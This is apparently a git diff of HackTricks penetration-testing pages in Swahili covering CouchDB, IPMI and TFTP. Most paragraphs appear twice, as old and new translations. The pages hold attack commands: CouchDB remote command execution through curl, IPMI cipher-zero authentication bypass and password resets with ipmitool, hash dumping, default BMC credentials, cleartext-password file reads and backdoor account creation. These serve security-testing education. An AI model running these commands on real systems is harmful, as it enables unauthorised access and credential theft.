curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"'
```
Mchakato uliendelea na uundaji wa kisanduku cha habari na hati, ukifuatiwa na jaribio la kutekeleza nambari kupitia ramani ya maoni ya desturi inayolingana na seva ya utafutaji iliyopewa hivi karibuni:
Mchakato uliendelea na uundaji wa hifadhidata na hati, ukifuatwa na jaribio la kutekeleza msimbo kupitia ramani ya mtazamo maalum kwa seva ya uchunguzi iliyoongezwa hivi karibuni:
```bash
curl -X PUT 'http://0xdf:df@localhost:5984/df'
curl -X PUT 'http://0xdf:df@localhost:5984/df/zero' -d '{"_id": "HTP"}'
curl -X PUT 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"anything": {"map": ""} }, "language": "cmd"}'
```
**[Muhtasari](https://github.com/carlospolop/hacktricks/pull/116/commits/e505cc2b557610ef5cce09df6a14b10caf8f75a0)** na mzigo mbadala hutoa ufahamu zaidi juu ya kutumia CVE-2017-12636 chini ya hali maalum. **Rasilimali muhimu** za kutumia udhaifu huu ni pamoja na:
A **[muhtasari](https://github.com/carlospolop/hacktricks/pull/116/commits/e505cc2b557610ef5cce09df6a14b10caf8f75a0)** wenye payload mbadala unatoa ufahamu zaidi kuhusu kutumia CVE-2017-12636 chini ya hali maalum. **Rasilimali muhimu** za kutumia udhaifu huu ni pamoja na:
- [Nambari ya POC ya kudukua](https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/exp.py)
- [Ingizo la Exploit Database](https://www.exploit-db.com/exploits/44913/)
- [Msimbo wa POC exploit](https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/exp.py)
- [Kichwa cha Taarifa ya Exploit Database](https://www.exploit-db.com/exploits/44913/)
## Shodan
* `port:5984 couchdb`
## Marejeo
## Marejeleo
* [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html)
* [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa katika HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

104
network-services-pentesting/623-udp-ipmi.md
View file

@ -2,111 +2,112 @@
## 623/UDP/TCP - IPMI
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Taarifa Msingi
## Basic Information
### **Muhtasari wa IPMI**
### **Overview of IPMI**
**[Intelligent Platform Management Interface (IPMI)](https://www.thomas-krenn.com/en/wiki/IPMI_Basics)** inatoa njia iliyostandardizwa ya usimamizi na ufuatiliaji wa mbali wa mifumo ya kompyuta, bila kujali mfumo wa uendeshaji au hali ya umeme. Teknolojia hii inaruhusu wasimamizi wa mfumo kusimamia mifumo kwa mbali, hata wakati zimezimwa au hazijibu, na ni muhimu hasa kwa:
**[Intelligent Platform Management Interface (IPMI)](https://www.thomas-krenn.com/en/wiki/IPMI_Basics)** inatoa njia iliyoimarishwa ya usimamizi wa mbali na ufuatiliaji wa mifumo ya kompyuta, bila kujali mfumo wa uendeshaji au hali ya nguvu. Teknolojia hii inawawezesha wasimamizi wa mifumo kusimamia mifumo kwa mbali, hata wakati zimezimwa au hazijajibu, na ni muhimu hasa kwa:
- Mipangilio ya awali ya kuanza mfumo
- Mipangilio ya awali ya OS
- Usimamizi wa kuzima nguvu
- Kurejesha kutoka kwa kushindwa kwa mfumo
- Kupona kutoka kwa kushindwa kwa mfumo
IPMI inaweza kufuatilia joto, voltage, kasi ya kifaa cha kupoza hewa, na ugavi wa umeme, pamoja na kutoa habari ya hesabu, kukagua magogo ya vifaa, na kutuma tahadhari kupitia SNMP. Kwa uendeshaji wake, inahitajika chanzo cha umeme na uhusiano wa LAN.
IPMI ina uwezo wa kufuatilia joto, voltages, kasi za mashabiki, na vyanzo vya nguvu, pamoja na kutoa taarifa za hesabu, kupitia kumbukumbu za vifaa, na kutuma arifa kupitia SNMP. Muhimu kwa uendeshaji wake ni chanzo cha nguvu na muunganisho wa LAN.
Tangu kuanzishwa kwake na Intel mnamo 1998, IPMI imeungwa mkono na wauzaji wengi, ikiboresha uwezo wa usimamizi wa mbali, haswa na msaada wa toleo la 2.0 kwa serial juu ya LAN. Sehemu muhimu ni pamoja na:
Tangu ilipoanzishwa na Intel mwaka 1998, IPMI imeungwa mkono na wauzaji wengi, ikiongeza uwezo wa usimamizi wa mbali, hasa na msaada wa toleo la 2.0 kwa serial juu ya LAN. Vipengele muhimu ni pamoja na:
- **Baseboard Management Controller (BMC):** Kichapishi kikuu cha IPMI kwa shughuli.
- **Mabasi na Viunganishi vya Mawasiliano:** Kwa mawasiliano ya ndani na nje, ikiwa ni pamoja na ICMB, IPMB, na viunganishi mbalimbali kwa uhusiano wa ndani na wa mtandao.
- **IPMI Memory:** Kwa kuhifadhi magogo na data.
- **Baseboard Management Controller (BMC):** Kichakataji kikuu cha IPMI.
- **Communication Buses and Interfaces:** Kwa mawasiliano ya ndani na nje, ikiwa ni pamoja na ICMB, IPMB, na interfaces mbalimbali za muunganisho wa ndani na mtandao.
- **IPMI Memory:** Kwa kuhifadhi kumbukumbu na data.
![https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right](https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right)
**Bandari ya Default**: 623/UDP/TCP (Kawaida inatumia UDP lakini inaweza pia kuendesha kwenye TCP)
**Default Port**: 623/UDP/TCP (Kawaida iko kwenye UDP lakini inaweza pia kuwa inafanya kazi kwenye TCP)
## Uchunguzi
## Enumeration
### Ugunduzi
### Discovery
```bash
nmap -n -p 623 10.0.0./24
nmap -n-sU -p 623 10.0.0./24
use auxiliary/scanner/ipmi/ipmi_version
```
Unaweza **kutambua** **toleo** kwa kutumia:
Unaweza **kubaini** **toleo** ukitumia:
```bash
use auxiliary/scanner/ipmi/ipmi_version
nmap -sU --script ipmi-version -p 623 10.10.10.10
```
### Mipasuko ya Usalama ya IPMI
### IPMI Vulnerabilities
Katika uwanja wa IPMI 2.0, kasoro kubwa ya usalama iligunduliwa na Dan Farmer, ikifichua kasoro kupitia **aina ya kificho 0**. Kasoro hii, iliyodhibitishwa kwa undani katika [utafiti wa Dan Farmer](http://fish2.com/ipmi/cipherzero.html), inawezesha ufikiaji usiohalali na nenosiri lolote linalotolewa ikiwa mtumiaji halali analengwa. Udhaifu huu uligunduliwa katika BMC mbalimbali kutoka kwa watengenezaji kama vile HP, Dell, na Supermicro, ikionyesha tatizo kubwa katika utekelezaji wa IPMI 2.0.
Katika eneo la IPMI 2.0, kasoro kubwa ya usalama iligunduliwa na Dan Farmer, ikifunua udhaifu kupitia **cipher type 0**. Udhaifu huu, ulioandikwa kwa undani katika [utafiti wa Dan Farmer](http://fish2.com/ipmi/cipherzero.html), unaruhusu ufikiaji usioidhinishwa kwa kutumia nenosiri lolote ikiwa mtumiaji halali anashambuliwa. Udhaifu huu ulipatikana katika BMC mbalimbali kutoka kwa watengenezaji kama HP, Dell, na Supermicro, ukionyesha tatizo lililoenea katika utekelezaji wote wa IPMI 2.0.
### **Kupitisha Uthibitishaji wa IPMI kupitia Kificho 0**
### **IPMI Authentication Bypass via Cipher 0**
Ili kugundua kasoro hii, skana ya ziada ya Metasploit ifuatayo inaweza kutumika:
```bash
use auxiliary/scanner/ipmi/ipmi_cipher_zero
```
Udanganyifu wa kasoro hii unaweza kufanikishwa kwa kutumia `ipmitool`, kama inavyoonyeshwa hapa chini, kuruhusu orodha na marekebisho ya nywila za mtumiaji:
Utekelezaji wa kasoro hii unaweza kufanywa kwa kutumia `ipmitool`, kama inavyoonyeshwa hapa chini, ikiruhusu orodha na mabadiliko ya nywila za watumiaji:
```bash
apt-get install ipmitool # Installation command
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list # Lists users
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 # Changes password
```
### **IPMI 2.0 RAKP Uthibitisho wa Mbali wa Kupata Hash ya Nenosiri la Mbali**
### **IPMI 2.0 RAKP Uthibitisho wa Ujumbe wa Mbali wa Nywila ya Hash**
Udhaifu huu unawezesha kupata nywila zilizohifadhiwa kwa chumvi (MD5 na SHA1) kwa jina lolote la mtumiaji lililopo. Ili kujaribu udhaifu huu, Metasploit inatoa moduli:
Ushirikiano huu unaruhusu upatikanaji wa nywila za hash zilizotiwa chumvi (MD5 na SHA1) kwa jina lolote lililopo. Ili kujaribu ushirikiano huu, Metasploit inatoa moduli:
```bash
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
```
### **Uthibitishaji wa IPMI Usio na Kitambulisho**
### **IPMI Anonymous Authentication**
Usanidi wa chaguo-msingi katika BMC nyingi huruhusu ufikiaji "usio na kitambulisho", ambao unajulikana kwa kutokuwepo kwa majina ya mtumiaji na nywila. Usanidi huu unaweza kutumiwa kudukua upya nywila za akaunti za watumiaji walio na majina kwa kutumia `ipmitool`:
Mkonfigu wa kawaida katika BMC nyingi unaruhusu ufikiaji wa "anonymous", unaojulikana kwa nywila na jina la mtumiaji zisizo na thamani. Mkonfigu huu unaweza kutumiwa kubadilisha nywila za akaunti za watumiaji waliopewa jina kwa kutumia `ipmitool`:
```bash
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword
```
### **Nenosiri za Wazi za Supermicro IPMI**
### **Supermicro IPMI Clear-text Passwords**
Chaguo muhimu katika IPMI 2.0 inahitaji uhifadhi wa nywila za wazi ndani ya BMCs kwa madhumuni ya uwakilishi. Uhifadhi wa Supermicro wa nywila hizi katika maeneo kama vile `/nv/PSBlock` au `/nv/PSStore` unaleta wasiwasi mkubwa wa usalama:
Chaguo muhimu katika muundo wa IPMI 2.0 kinahitaji uhifadhi wa nywila za wazi ndani ya BMCs kwa madhumuni ya uthibitishaji. Uhifadhi wa nywila hizi na Supermicro katika maeneo kama `/nv/PSBlock` au `/nv/PSStore` kunaibua wasiwasi mkubwa wa usalama:
```bash
cat /nv/PSBlock
```
### **Supermicro IPMI UPnP Vulnerability**
### **Supermicro IPMI UPnP Uthibitisho wa Usalama**
Kujumuishwa kwa msikilizaji wa UPnP SSDP katika firmware ya IPMI ya Supermicro, haswa kwenye bandari ya UDP 1900, inaleta hatari kubwa ya usalama. Udhaifu katika Intel SDK kwa vifaa vya UPnP toleo 1.3.1, kama ilivyoelezwa na [ufichuzi wa Rapid7](https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play), inaruhusu ufikiaji wa mizizi kwa BMC:
Kuongezwa kwa msikilizaji wa UPnP SSDP katika firmware ya IPMI ya Supermicro, hasa kwenye bandari ya UDP 1900, kunaingiza hatari kubwa ya usalama. Uthibitisho katika Intel SDK kwa ajili ya vifaa vya UPnP toleo 1.3.1, kama ilivyoelezwa na [kufichuliwa kwa Rapid7](https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play), kunawezesha ufikiaji wa mizizi kwa BMC:
```bash
msf> use exploit/multi/upnp/libupnp_ssdp_overflow
```
### Brute Force
**HP inarandarandisha nenosiri la msingi** kwa bidhaa yake ya **Integrated Lights Out (iLO)** wakati wa utengenezaji. Mazoea haya yanatofautiana na wazalishaji wengine, ambao kwa kawaida hutumia **vitambulisho vya msingi vya tuli**. Muhtasari wa majina ya mtumiaji na nywila za msingi kwa bidhaa mbalimbali ni kama ifuatavyo:
**HP inabadilisha nenosiri la default** kwa bidhaa yake ya **Integrated Lights Out (iLO)** wakati wa utengenezaji. Praktika hii inatofautiana na wazalishaji wengine, ambao mara nyingi hutumia **akili za default zisizobadilika**. Muhtasari wa majina ya watumiaji na nenosiri za default kwa bidhaa mbalimbali unapatikana kama ifuatavyo:
- **HP Integrated Lights Out (iLO)** hutumia **herufi ndefu ya wahusika 8 iliyorandarandishwa kiwandani** kama nywila yake ya msingi, ikionyesha kiwango cha juu cha usalama.
- Bidhaa kama **Dell's iDRAC, IBM's IMM**, na **Fujitsu's Integrated Remote Management Controller** hutumia nywila rahisi za kudhani kama "calvin", "PASSW0RD" (na sifuri), na "admin" mtawalia.
- Vivyo hivyo, **Supermicro IPMI (2.0), Oracle/Sun ILOM**, na **ASUS iKVM BMC** pia hutumia vitambulisho vya msingi rahisi, na "ADMIN", "changeme", na "admin" kama nywila zao.
- **HP Integrated Lights Out (iLO)** inatumia **mfuatano wa herufi 8 ulioandaliwa kiwandani** kama nenosiri lake la default, ikionyesha kiwango cha juu cha usalama.
- Bidhaa kama **iDRAC ya Dell, IMM ya IBM**, na **Meneja wa Usimamizi wa Kijijini wa Fujitsu** zinatumia nenosiri rahisi kubashiri kama "calvin", "PASSW0RD" (ikiwa na sifuri), na "admin" mtawalia.
- Vivyo hivyo, **Supermicro IPMI (2.0), Oracle/Sun ILOM**, na **ASUS iKVM BMC** pia zinatumia akili rahisi za default, ambapo "ADMIN", "changeme", na "admin" zinatumika kama nenosiri zao.
## Kupata Mwenyeji kupitia BMC
## Accessing the Host via BMC
Upatikanaji wa kiutawala kwa Baseboard Management Controller (BMC) hufungua njia mbalimbali za kupata mfumo wa uendeshaji wa mwenyeji. Njia rahisi ni kuchexploitisha utendaji wa Keyboard, Video, Mouse (KVM) wa BMC. Hii inaweza kufanywa kwa kuzima upya mwenyeji hadi kwenye kabati la mizizi kupitia GRUB (kwa kutumia `init=/bin/sh`) au kwa kuanza kutoka kwenye CD-ROM ya kisasa iliyowekwa kama diski ya uokoaji. Njia kama hizo zinaruhusu kuingiza mlango nyuma, kuchota data, au kufanya hatua zozote zinazohitajika kwa tathmini ya usalama. Hata hivyo, hii inahitaji kuzima upya mwenyeji, ambayo ni kikwazo kikubwa. Bila kuzima upya, kupata mwenyeji unaoendelea ni ngumu zaidi na inatofautiana na usanidi wa mwenyeji. Ikiwa konsoli ya kimwili au ya serial ya mwenyeji inabaki imeingia, inaweza kuchukuliwa kwa urahisi kupitia KVM ya BMC au utendaji wa serial-over-LAN (sol) kupitia `ipmitool`. Uchunguzi wa utumiaji wa rasilimali za vifaa zilizoshirikiwa, kama vile basi la i2c na chip ya Super I/O, ni eneo ambalo linahitaji uchunguzi zaidi.
Upatikanaji wa kiutawala kwa Msimamizi wa Bodi ya Msingi (BMC) unafungua njia mbalimbali za kufikia mfumo wa uendeshaji wa mwenyeji. Njia rahisi ni kutumia kazi ya Kivinjari, Video, Panya (KVM) ya BMC. Hii inaweza kufanywa kwa kuanzisha upya mwenyeji hadi kwenye shell ya root kupitia GRUB (ukitumia `init=/bin/sh`) au kuanzisha kutoka kwa CD-ROM ya virtual iliyowekwa kama diski ya kuokoa. Njia hizi zinaruhusu kudhibiti moja kwa moja diski ya mwenyeji, ikiwa ni pamoja na kuingiza backdoors, kutoa data, au hatua zozote zinazohitajika kwa tathmini ya usalama. Hata hivyo, hii inahitaji kuanzisha upya mwenyeji, ambayo ni hasara kubwa. Bila kuanzisha upya, kufikia mwenyeji anayekimbia ni ngumu zaidi na inategemea usanidi wa mwenyeji. Ikiwa console ya kimwili au serial ya mwenyeji inaendelea kuingia, inaweza kuchukuliwa kwa urahisi kupitia kazi za KVM za BMC au serial-over-LAN (sol) kupitia `ipmitool`. Kuchunguza matumizi ya rasilimali za vifaa vilivyoshirikiwa, kama vile basi ya i2c na chip ya Super I/O, ni eneo linalohitaji uchunguzi zaidi.
## Kuweka Mlango Nyuma kwenye BMC kutoka kwa Mwenyeji
## Introducing Backdoors into BMC from the Host
Baada ya kudukua mwenyeji ulio na BMC, **kiolesura cha BMC cha ndani kinaweza kutumika kuweka mlango nyuma**, kuunda uwepo wa kudumu kwenye seva. Shambulio hili linahitaji uwepo wa **`ipmitool`** kwenye mwenyeji uliodukuliwa na kuwezeshwa kwa msaada wa dereva wa BMC. Amri zifuatazo zinaonyesha jinsi akaunti mpya ya mtumiaji inavyoweza kuingizwa kwenye BMC kwa kutumia kiolesura cha ndani cha mwenyeji, ambacho kinapuuza haja ya uwakilishi. Mbinu hii inatumika kwa anuwai ya mifumo ya uendeshaji ikiwa ni pamoja na Linux, Windows, BSD, na hata DOS.
Baada ya kuathiri mwenyeji aliye na BMC, **kiolesura cha BMC cha ndani kinaweza kutumika kuingiza akaunti ya mtumiaji ya backdoor**, kuunda uwepo wa kudumu kwenye seva. Shambulio hili linahitaji uwepo wa **`ipmitool`** kwenye mwenyeji aliyeathiriwa na kuanzishwa kwa msaada wa dereva wa BMC. Amri zifuatazo zinaonyesha jinsi akaunti mpya ya mtumiaji inaweza kuingizwa kwenye BMC kwa kutumia kiolesura cha ndani cha mwenyeji, ambacho kinapita hitaji la uthibitisho. Mbinu hii inatumika kwa mifumo mbalimbali ya uendeshaji ikiwa ni pamoja na Linux, Windows, BSD, na hata DOS.
```bash
ipmitool user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
@ -126,20 +127,21 @@ ID Name Callin Link Auth IPMI Msg Channel Priv Limit
* `port:623`
## Marejeo
## References
* [https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/](https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/)
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

50
network-services-pentesting/69-udp-tftp.md
View file

@ -1,42 +1,43 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
# Taarifa Msingi
# Basic Information
**Itifaki ya Uhamishaji wa Faili wa Trivial (TFTP)** ni itifaki rahisi inayotumika kwenye **bandari ya UDP 69** ambayo inaruhusu uhamisho wa faili bila kuhitaji uwakilishi. Iliyotajwa katika **RFC 1350**, unyenyekevu wake una maana haina vipengele muhimu vya usalama, ikisababisha matumizi madogo kwenye Mtandao wa Umma. Walakini, **TFTP** inatumiwa sana ndani ya mitandao mikubwa ya ndani kwa kusambaza **faili za usanidi** na **picha za ROM** kwa vifaa kama **simu za VoIP**, shukrani kwa ufanisi wake katika hali hizi maalum.
**Trivial File Transfer Protocol (TFTP)** ni protokali rahisi inayotumika kwenye **UDP port 69** inayoruhusu uhamishaji wa faili bila kuhitaji uthibitisho. Imeangaziwa katika **RFC 1350**, urahisi wake unamaanisha haina vipengele muhimu vya usalama, na kusababisha matumizi yake kuwa madogo kwenye mtandao wa umma. Hata hivyo, **TFTP** inatumika sana ndani ya mitandao mikubwa ya ndani kwa kusambaza **faili za usanidi** na **picha za ROM** kwa vifaa kama **VoIP handsets**, kutokana na ufanisi wake katika hali hizi maalum.
**TODO**: Toa habari kuhusu ni nini Bittorrent-tracker (Shodan inatambua bandari hii kwa jina hilo). Ikiwa una habari zaidi kuhusu hili tujulishe kwa mfano kwenye [**kikundi cha telegram cha HackTricks**](https://t.me/peass) (au kwenye suala la github katika [PEASS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)).
**TODO**: Toa taarifa kuhusu nini ni Bittorrent-tracker (Shodan inatambua bandari hii kwa jina hilo). Ikiwa una maelezo zaidi kuhusu hili tujulishe kwa mfano katika [**HackTricks telegram group**](https://t.me/peass) (au katika suala la github katika [PEASS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)).
**Bandari ya Default:** 69/UDP
**Default Port:** 69/UDP
```
PORT STATE SERVICE REASON
69/udp open tftp script-set
```
# Uchambuzi
# Enumeration
TFTP haitoi orodha ya saraka kwa hivyo script `tftp-enum` kutoka `nmap` itajaribu kuvunja nguvu njia za msingi.
TFTP haitoi orodha ya saraka hivyo skripti `tftp-enum` kutoka `nmap` itajaribu kulazimisha njia za kawaida.
```bash
nmap -n -Pn -sU -p69 -sV --script tftp-enum <IP>
```
## Pakua/Pakia
## Download/Upload
Unaweza kutumia Metasploit au Python kuangalia kama unaweza kupakua/pakia faili:
Unaweza kutumia Metasploit au Python kuangalia kama unaweza kupakua/kupakia faili:
```bash
msf5> auxiliary/admin/tftp/tftp_transfer_util
```
@ -57,16 +58,17 @@ client.upload("filename to upload", "/local/path/file", timeout=5)
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
